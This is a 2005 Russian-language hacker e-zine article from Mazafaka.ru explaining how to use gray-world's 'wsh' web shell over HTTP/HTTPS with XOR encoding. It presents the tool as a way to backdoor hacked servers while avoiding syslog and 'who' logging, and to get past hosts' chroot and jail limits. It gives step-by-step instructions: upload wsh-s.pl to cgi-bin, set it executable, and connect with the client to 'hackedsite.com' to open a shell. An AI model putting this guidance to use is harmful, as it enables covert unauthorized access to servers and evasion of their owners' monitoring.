Если у вас нету шелла, его не потянет хаксор :-)... Думайте сами, решайте сами - иметь или не иметь - шелл с поддержкой xor :))), а также SSL шифрования. Ну да ладно - шутки в сторону и переходим к серьезному разговору о жадности хостеров, и о том как нам эту жадность обойти.

Материал в этой статье не нов, я писал об этой тулзе на форуме mazafaka.ru, но тогда эта статья не привлекла много внимания, по причине того что народ не совсем понял ГДЕ удобно использовать данный инструмент. Теперь, я решил восполнить этот пробел.

Итак, речь идет о замечательной тулзе от команды gray-world (http://gray-world.net), под названием web-shell (wsh). В статье на форуме мазы, я писал о том что эта утилита позволяет делать следующее:

"Суть ее в том что она позволяет обходить любые фаерволы, а работает по протоколам http и https.
Поддерживает также обычное Xor кодирование.



Причем работает и под никсы и под винду (для никсов - perl'оывй сценарий сервера и перловый скрипт клиента - для винды Сишный сервер и явааплет - клиент (насколько я понял) хотя никсовые perl скрипты тоже можно заюзать)."

Помимо, этих замечательных способностей, (она инкапсулирует комманды от пользователя в POST запросы к серверу, а сервер, распаковывает эти запросы, и выполняет на сервере - передавая клиенту ответ из STDOUT,STDERR), она предоставляет полноценный шелл-аккаунт который не логируется в журналах syslogd и прочих логгерах (так как вы не работаете на реальном терминале и не регистрируетесь на нем (соответственно вас не видно по команде who)). В статье на форуме, я писал что это удобно для того чтобы забэкдорить взломанный сервак. Но, позже, когда у меня был один сайтик, на котором мне давали только ftp-доступ, я подумал, а почему бы мне не включить в свой пакет услуг хостинга еще и доступ к /bin/bash, причем бесплатно и безо всяких chroot, jail, etc. И я заюзал снова софтинку от gray-world team. Что она мне давала? Неограниченный shell (то есть я мог свободно перемещаться по всем доступным для моего пользователя директориям), мог отлаживать скрипты (как на обычном шелл аккаунте) и прочее. После того как я успешно применил этот опыт на этом хостере, я перенес его и на других. В начале это был h12, который давал мне shell, но с этого шела я например не мог просмотреть файл /etc/passwd, со своим шеллом мне это спокойно удалось. Затем еще один хостер, который предоставлял мне шелл через известный многим jail (обрезанный по самое не балуйся), да еще и работающий в chroot-окружении. При помощи своего шелла - я быстро изучил сервак изнутри (преодолев ограничения chroot-окружения и jail-shell'a), и в общем-то юзаю теперь его на тех серваках, где мне не дают shell доступ или дают обрезанный shell. Все это бесплатно и в неограниченном количестве :). Теперь вкратце о том как работать с этой тулзой.

Как заюзать утилиты wsh от gray-world тимы?

Итак нам потребуются файлы:
wsh-s.pl
Этот скрипт надо будет залить на сервер в директорию cgi-bin (или ее поддиректории)
в общем в директорию из которой возможно исполнять cgi сценарии (по умолчанию в апаче это cgi-bin),
но предварительно я совтую изменить значение Xor ключа (если будете использовать Xor шифрование),
по умолчанию я поставил туда "123456" ключ - вы можете изменить его на любой другой.
Итак после того как файл залит на сервак и на него проставлены права 755. Можно приступать к конфигурированию
клиента.
Для этого нам потребуются следующие файлы:
wsh-c.conf
wsh-c.pl
все они лежат в архиве здесь
Распаковываем и запускаем wsh-c.pl. Главное чтобы файл wsh-c.conf лежал в одной директоии с wsh-c.pl
Он нам выдаст это:

Quote:
poizon# perl wsh-c.pl
usage: wsh-c.pl host[:port]/dir/script KEY
Теперь когда юзадж нaм понятен делаем так:
Quote:
poizon# perl wsh-c.pl hackedsite.com:80/cgi-bin/wsh-s.pl 123456
Если все прошло удачно то получаем примерно это:
Quote:
wsh:[/usr/local/www/cgi-bin]#

Все - машина забэкдорена основательно (или лучше сказать - у нас теперь халявный shell-аккаунт).
При настройке этих скриптов выяснились некоторые баги - я их исправил в тех скриптах которые предлагаю вам
для скачки. Дело в том, что на сервере Apache 1.3.x, скрипт работает через поле HTTP_HTTP_***, а не через HTTP_*** - вот это поле я правил в скриптах, чтобы они заработали. По любым вопросам, вы можете обращаться на форум команды gray-world.

Удач!


Автор: PoizOn /25.02.05/ ©

Mazafaka.Ru - E-Zine - 2005 ©